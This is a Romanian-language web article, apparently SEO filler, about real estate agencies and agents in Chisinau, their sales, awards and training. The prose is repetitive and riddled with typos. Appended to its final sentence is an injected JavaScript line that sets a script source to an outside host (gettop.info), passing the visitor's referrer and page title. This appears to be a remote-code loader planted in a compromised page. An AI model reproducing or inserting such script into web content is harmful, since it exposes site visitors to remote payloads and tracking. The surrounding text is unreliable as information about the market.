imobile chisinau

imobile chisinau

Firmele ce sunt specializate in achizitia dar in acelasi timp si in vanzarea imobilelor in Chisinau, au lunar vanari si mai mari de 100 de locuinte, cu precadere de apartamente noi, aceste agentii fiind formate numai din echipe cu specialisti care sunt formați și coordonați cu deosebita atentie si cu răbdare.

Unii dintre specialisti au venit chiar din industria turismului catre industria imobiliarelor, in perioada aterioara si au ajuns la etapa de prăbușire a acestei pietei, in felul acesta ajungand să lucreze cu aceea cares unt cei mai buni intre dezvoltatorii rezidențiali ce lucreaza in Chisinau, sau in București cat și in alte orase la fel de mari.

Despre cat de bine este să lucrezi în aceasta industrie a imobilelor in Chisinau cat si care sunt satisfacțiile si daesemeni oportunitățile ce sunt oferite de catre aceasta industrie din domeniul imobiliarelor, cei care sunt specialisti in acest domeniu au publicat materiale si articole de specialitate, astfel incat clientii sa poata sa inteleaga importanta muncii lor.

Pietele imobilire ale Chisinaului

Piața imobiliarelor are o mare nevoie de buni specialisti, de agenți imobiliari specializati. Deasemeni, contextul economic poate sa asigura ascensiunea rapida si foarte buna in domeniu aceasta vast al imobiliarelor.

Sunt cunoscute pe piata si diverse agentii imobiliare care au primit chiar si premii, fiind in topul clasamentelor intocmite in legatura cu acest domeniu al firmelor de profil ce au avut parcursul cel mai bun, topuri prezentate în cadrul diverselor evenimente care au rolul de a reuni jucatori care sunt printre cei mai activi in acest sector al imobiliarelor , aceste premii fiind acordate de organizatii cunoscute, renumite din domeniu contructiilor si din cel al tranzactionarilor, al vanzarilor si achizitiilor de imobile in Chisinau.

Premiile de felul acesta sunt acordate in functie de anumite criterii cum ar fi cifra de afaceri, insa se ia in calcul incluisv numărul proiectelor pe care astfel de firme le au in derulare cadrul portofoliului cat și de numărul apartamente pe care acestea le-au vândut in anul anterior.

Cu toate astea, specialistii din cadrul firmelor premiate mentioneaza că nu pentru obtinerea lor isi desfășoara asa de bine activitatea, deși, sigur ca aprecierile sunt motivante si pot reprezinta o confirmare aspura faptului că fac atat ce cat si cum trebuie, dar principalele motive constau in satisfacerea acelor cerinte pe careclientii le au si in acest fel ajungand la o crestere importanta a profitabilitatii respectivelor agentii imobiliare in care isi desfasoara activitatea.

Putem afirma si faptul ca sunt puțini acei consultanți imobiliari cu adevarat specializați numai pe segmentul noilor locuinței.

Motivarea facuta specialistilor imobiliari 

Sunt specialisti cu mai multa experiență in acest domeniu al achizitiilor si vanzarilor de imobile in Chisinau, dar nu sunt prea multi cei care au experiența celor care sunt specializati in niste proiecte rezidentialecare sunt nou construite.

Acestea, intrape piata imobiliarelor in fiecrae zi si s-au dedicat acestor locuințenoi, reusind in felul acesta faca performanta in acest domeniu. Ca sa-si îmbogățeasca experiența, specialisti se ocupa de regula, pentru inceput de piața specializata in locuințe vechi ca sa vada astfel, ce se întâmplă si cum o sa decurga vanzarile in cazula acesta practic invatand asa care sunt secretele meseriei.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;